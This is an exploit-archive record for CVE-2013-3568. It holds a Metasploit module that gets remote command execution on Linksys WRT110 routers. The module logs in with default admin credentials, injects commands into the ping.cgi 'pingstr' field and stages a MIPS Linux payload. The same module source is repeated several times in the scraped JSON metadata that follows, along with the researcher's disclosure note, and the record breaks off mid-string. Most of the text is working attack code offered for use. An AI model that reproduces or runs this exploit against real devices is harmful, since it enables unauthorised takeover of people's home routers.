ID 1337DAY-ID-21361 Type zdt Reporter metasploit Modified 2013-10-10T00:00:00
Description
Exploit for hardware platform in category remote exploits
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys WRT110 Remote Command Execution',
'Description' => %q{
The Linksys WRT110 consumer router is vulnerable to a command injection
exploit in the ping field of the web interface.
},
'Author' =>
[
'Craig Young', # Vulnerability discovery
'joev', # msf module
'juan vazquez' # module help + echo cmd stager
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3568'],
['BID', '61151'],
['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
],
'DisclosureDate' => 'Jul 12 2013',
'Privileged' => true,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSLE,
'Targets' =>
[
['Linux mipsel Payload', { } ]
],
'DefaultTarget' => 0,
))
register_options([
OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/HNAP1/'
})
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
test_login!
execute_cmdstager
end
# Sends an HTTP request with authorization header to the router
# Raises an exception unless the login is successful
def test_login!
print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
res = send_auth_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if not res or res.code == 401 or res.code == 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
else
print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
end
end
# Run the command on the router
def execute_command(cmd, opts)
send_auth_request_cgi({
'uri' => '/ping.cgi',
'method' => 'POST',
'vars_post' => {
'pingstr' => '& ' + cmd
}
})
Rex.sleep(1) # Give the device a second
end
# Helper methods
def user; datastore['USERNAME']; end
def pass; datastore['PASSWORD'] || ''; end
def send_auth_request_cgi(opts={}, timeout=nil)
timeout ||= datastore['TIMEOUT']
opts.merge!('authorization' => basic_auth(user, pass))
begin
send_request_cgi(opts, timeout)
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
end
# 0day.today [2018-01-10] #
{"hash": "bbb11467bebd048f22960838503f1c2f7a970db9cd2cf057bb98ff534275fd77", "id": "1337DAY-ID-21361", "lastseen": "2018-01-10T21:27:16", "viewCount": 6, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "1737fa4e58f4dc3cbcc8aa07ad173cd5", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "7f6e2c7295eb8d1b299a85dc2e36b15b", "key": "href"}, {"hash": "583b5a9bbee5a6abead17333aef2c580", "key": "modified"}, {"hash": "583b5a9bbee5a6abead17333aef2c580", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "02eb27f2f0d16ec88db3a44451259157", "key": "sourceData"}, {"hash": "e279e7891f7fd205a1187ab03ede92a4", "key": "sourceHref"}, {"hash": "10c6449bdcb30c899c259fed9b074dbd", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-01-10T21:27:16"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29549", "SECURITYVULNS:VULN:13169"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/LINKSYS_WRT110_CMD_EXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:123333", "PACKETSTORM:123540"]}, {"type": "exploitdb", "idList": ["EDB-ID:28856", "EDB-ID:28484"]}, {"type": "zdt", "idList": ["1337DAY-ID-21262"]}], "modified": "2018-01-10T21:27:16"}, "vulnersScore": 0.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/21361", "description": "Exploit for hardware platform in category remote exploits", "title": "Linksys WRT110 Remote Command Execution Vulnerability", "history": [{"bulletin": {"hash": "5426ca4668389dba727bea751ea9d1cd7d32f7eaaa6ffb1085f5d9756e9dcd6d", "id": "1337DAY-ID-21361", "lastseen": "2016-04-19T02:01:37", "enchantments": {"score": {"value": 8.5, "modified": "2016-04-19T02:01:37"}}, "hashmap": [{"hash": "f907225f0567aea22bda182e0f3ad7a8", "key": "description"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0b655dc1f6847d7dded22fc58ce41c68", "key": "sourceData"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "583b5a9bbee5a6abead17333aef2c580", "key": "modified"}, {"hash": "1c41d1d20b99b65960f5f9fce0a8f30f", "key": "sourceHref"}, {"hash": "c122ae5d2e4fb4b319c246fc2bf44076", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "583b5a9bbee5a6abead17333aef2c580", "key": "published"}, {"hash": "10c6449bdcb30c899c259fed9b074dbd", "key": "title"}, {"hash": "1737fa4e58f4dc3cbcc8aa07ad173cd5", "key": "cvelist"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/21361", "description": "Exploit for hardware platform in category remote exploits", "viewCount": 0, "title": "Linksys WRT110 Remote Command Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": ["CVE-2013-3568"], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n \r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n \r\n end\r\n \r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n \r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n def exploit\r\n test_login!\r\n \r\n execute_cmdstager\r\n end\r\n \r\n # Sends an HTTP request with authorization header to the router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n \r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n \r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n \r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n \r\n Rex.sleep(1) # Give the device a second\r\n end\r\n \r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n \r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend\n\n# 0day.today [2016-04-19] #", "published": "2013-10-10T00:00:00", "references": [], "reporter": "metasploit", "modified": "2013-10-10T00:00:00", "href": "http://0day.today/exploit/description/21361"}, "lastseen": "2016-04-19T02:01:37", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": ["CVE-2013-3568"], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n \r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n \r\n end\r\n \r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n \r\n return Exploit::CheckCode::Safe\r\n end\r\n \r\n def exploit\r\n test_login!\r\n \r\n execute_cmdstager\r\n end\r\n \r\n # Sends an HTTP request with authorization header to the router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n \r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n \r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n \r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n \r\n Rex.sleep(1) # Give the device a second\r\n end\r\n \r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n \r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "published": "2013-10-10T00:00:00", "references": [], "reporter": "metasploit", "modified": "2013-10-10T00:00:00", "href": "https://0day.today/exploit/description/21361"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "description": "\r\n\r\nHi list,\r\nI would like to inform you that the latest available Linksys WRT110 firmware is prone to root shell command injection via cross-site request forgery. This vulnerability is the result of the web interface's failure to sanitize ping targets as well as a lack of csrf tokens. Linksys/Belkin has responded to my report to say that the vulnerability is mitigated by a 10 minute idle-timeout feature which is available for the admin portal on this device. It is likely that other devices with similar firmware are prone to this as well.\r\n\r\nThe command execution will not return output but it is possible to direct output into files which are available upon subsequent HTTP requests.\r\n\r\nThis issue was assigned as CVE-2013-3568.\r\n\r\nKind Regards,\r\nCraig Young (@CraigTweets)\r\n", "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:DOC:29549", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29549", "title": "CVE-2013-3568 - Linksys CSRF + Root Command Injection", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "description": "Crossite request forgery, XSS, code execution in web administration interface.", "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:VULN:13169", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13169", "title": "Linksys routers security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:21", "bulletinFamily": "exploit", "description": "", "modified": "2013-09-20T00:00:00", "published": "2013-09-20T00:00:00", "href": "https://packetstormsecurity.com/files/123333/Linksys-WRT110-Remote-Command-Execution.html", "id": "PACKETSTORM:123333", "type": "packetstorm", "title": "Linksys WRT110 Remote Command Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStagerEcho \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linksys WRT110 Remote Command Execution', \n'Description' => %q{ \nThe Linksys WRT110 consumer router is vulnerable to a command injection \nexploit in the ping field of the web interface. \n}, \n'Author' => \n[ \n'Craig Young', # Vulnerability discovery \n'joev <jvennix[at]rapid7.com>', # msf module \n'juan vazquez' # module help + echo cmd stager \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2013-3568'], \n['BID', '61151'], \n['URL', 'http://seclists.org/bugtraq/2013/Jul/78'] \n], \n'DisclosureDate' => 'Jul 12 2013', \n'Privileged' => true, \n'Platform' => ['linux'], \n'Arch' => ARCH_MIPSLE, \n'Targets' => \n[ \n['Linux mipsel Payload', { } ] \n], \n'DefaultTarget' => 0, \n)) \n \nregister_options([ \nOptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), \nOptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), \nOptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), \nOptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) \n], self.class) \n \nend \n \ndef check \nbegin \nres = send_request_cgi({ \n'uri' => '/HNAP1/' \n}) \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Safe \nend \n \nif res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/ \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \ntest_login! \n \nexecute_cmdstager \nend \n \n# Sends an HTTP request with authorization header to the router \n# Raises an exception unless the login is successful \ndef test_login! \nprint_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\") \n \nres = send_auth_request_cgi({ \n'uri' => '/', \n'method' => 'GET' \n}) \n \nif not res or res.code == 401 or res.code == 404 \nfail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\") \nelse \nprint_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\") \nend \nend \n \n# Run the command on the router \ndef execute_command(cmd, opts) \nsend_auth_request_cgi({ \n'uri' => '/ping.cgi', \n'method' => 'POST', \n'vars_post' => { \n'pingstr' => '& ' + cmd \n} \n}) \n \nRex.sleep(1) # Give the device a second \nend \n \n# Helper methods \ndef user; datastore['USERNAME']; end \ndef pass; datastore['PASSWORD'] || ''; end \n \ndef send_auth_request_cgi(opts={}, timeout=nil) \ntimeout ||= datastore['TIMEOUT'] \nopts.merge!('authorization' => basic_auth(user, pass)) \nbegin \nsend_request_cgi(opts, timeout) \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/123333/linksys_wrt110_cmd_exec_stager.rb.txt"}, {"lastseen": "2016-12-05T22:21:46", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-08T00:00:00", "published": "2013-10-08T00:00:00", "href": "https://packetstormsecurity.com/files/123540/Linksys-WRT110-Remote-Command-Execution.html", "id": "PACKETSTORM:123540", "type": "packetstorm", "title": "Linksys WRT110 Remote Command Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStagerEcho \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linksys WRT110 Remote Command Execution', \n'Description' => %q{ \nThe Linksys WRT110 consumer router is vulnerable to a command injection \nexploit in the ping field of the web interface. \n}, \n'Author' => \n[ \n'Craig Young', # Vulnerability discovery \n'joev', # msf module \n'juan vazquez' # module help + echo cmd stager \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2013-3568'], \n['BID', '61151'], \n['URL', 'http://seclists.org/bugtraq/2013/Jul/78'] \n], \n'DisclosureDate' => 'Jul 12 2013', \n'Privileged' => true, \n'Platform' => ['linux'], \n'Arch' => ARCH_MIPSLE, \n'Targets' => \n[ \n['Linux mipsel Payload', { } ] \n], \n'DefaultTarget' => 0, \n)) \n \nregister_options([ \nOptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), \nOptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), \nOptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), \nOptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) \n], self.class) \n \nend \n \ndef check \nbegin \nres = send_request_cgi({ \n'uri' => '/HNAP1/' \n}) \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Safe \nend \n \nif res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/ \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \ntest_login! \n \nexecute_cmdstager \nend \n \n# Sends an HTTP request with authorization header to the router \n# Raises an exception unless the login is successful \ndef test_login! \nprint_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\") \n \nres = send_auth_request_cgi({ \n'uri' => '/', \n'method' => 'GET' \n}) \n \nif not res or res.code == 401 or res.code == 404 \nfail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\") \nelse \nprint_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\") \nend \nend \n \n# Run the command on the router \ndef execute_command(cmd, opts) \nsend_auth_request_cgi({ \n'uri' => '/ping.cgi', \n'method' => 'POST', \n'vars_post' => { \n'pingstr' => '& ' + cmd \n} \n}) \n \nRex.sleep(1) # Give the device a second \nend \n \n# Helper methods \ndef user; datastore['USERNAME']; end \ndef pass; datastore['PASSWORD'] || ''; end \n \ndef send_auth_request_cgi(opts={}, timeout=nil) \ntimeout ||= datastore['TIMEOUT'] \nopts.merge!('authorization' => basic_auth(user, pass)) \nbegin \nsend_request_cgi(opts, timeout) \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/123540/linksys_wrt110_cmd_exec.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-03T09:05:01", "bulletinFamily": "exploit", "description": "Linksys WRT110 - Remote Command Execution. CVE-2013-3568. Remote exploit for hardware platform", "modified": "2013-10-10T00:00:00", "published": "2013-10-10T00:00:00", "id": "EDB-ID:28856", "href": "https://www.exploit-db.com/exploits/28856/", "type": "exploitdb", "title": "Linksys WRT110 - Remote Command Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n\r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n test_login!\r\n\r\n execute_cmdstager\r\n end\r\n\r\n # Sends an HTTP request with authorization header to the router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n\r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n\r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n\r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n send_auth_request_cgi({\r\n 'uri' => '/ping.cgi',\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'pingstr' => '& ' + cmd\r\n }\r\n })\r\n\r\n Rex.sleep(1) # Give the device a second\r\n end\r\n\r\n # Helper methods\r\n def user; datastore['USERNAME']; end\r\n def pass; datastore['PASSWORD'] || ''; end\r\n\r\n def send_auth_request_cgi(opts={}, timeout=nil)\r\n timeout ||= datastore['TIMEOUT']\r\n opts.merge!('authorization' => basic_auth(user, pass))\r\n begin\r\n send_request_cgi(opts, timeout)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unknown, \"#{rhost}:#{rport} - Could not connect to the webservice\")\r\n end\r\n end\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/28856/"}, {"lastseen": "2016-02-03T08:15:57", "bulletinFamily": "exploit", "description": "Linksys WRT110 - Remote Command Execution. CVE-2013-3568. Remote exploit for hardware platform", "modified": "2013-09-23T00:00:00", "published": "2013-09-23T00:00:00", "id": "EDB-ID:28484", "href": "https://www.exploit-db.com/exploits/28484/", "type": "exploitdb", "title": "Linksys WRT110 - Remote Command Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStagerEcho\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Linksys WRT110 Remote Command Execution',\r\n 'Description' => %q{\r\n The Linksys WRT110 consumer router is vulnerable to a command injection\r\n exploit in the ping field of the web interface.\r\n },\r\n 'Author' =>\r\n [\r\n 'Craig Young', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # msf module\r\n 'juan vazquez' # module help + echo cmd stager\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2013-3568'],\r\n ['BID', '61151'],\r\n ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']\r\n ],\r\n 'DisclosureDate' => 'Jul 12 2013',\r\n 'Privileged' => true,\r\n 'Platform' => ['linux'],\r\n 'Arch' => ARCH_MIPSLE,\r\n 'Targets' =>\r\n [\r\n ['Linux mipsel Payload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n ))\r\n\r\n register_options([\r\n OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),\r\n OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),\r\n OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),\r\n OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])\r\n ], self.class)\r\n\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/HNAP1/'\r\n })\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\\/ModelName>/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n test_login!\r\n\r\n execute_cmdstager\r\n end\r\n\r\n # Sends an HTTP request with authorization header to the router\r\n # Raises an exception unless the login is successful\r\n def test_login!\r\n print_status(\"#{rhost}:#{rport} - Trying to login with #{user}:#{pass}\")\r\n\r\n res = send_auth_request_cgi({\r\n 'uri' => '/',\r\n 'method' => 'GET'\r\n })\r\n\r\n if not res or res.code == 401 or res.code == 404\r\n fail_with(Failure::NoAccess, \"#{rhost}:#{rport} - Could not login with #{user}:#{pass}\")\r\n else\r\n print_good(\"#{rhost}:#{rport} - Successful login #{user}:#{pass}\")\r\n end\r\n end\r\n\r\n # Run the command on the router\r\n def execute_command(cmd, opts)\r\n 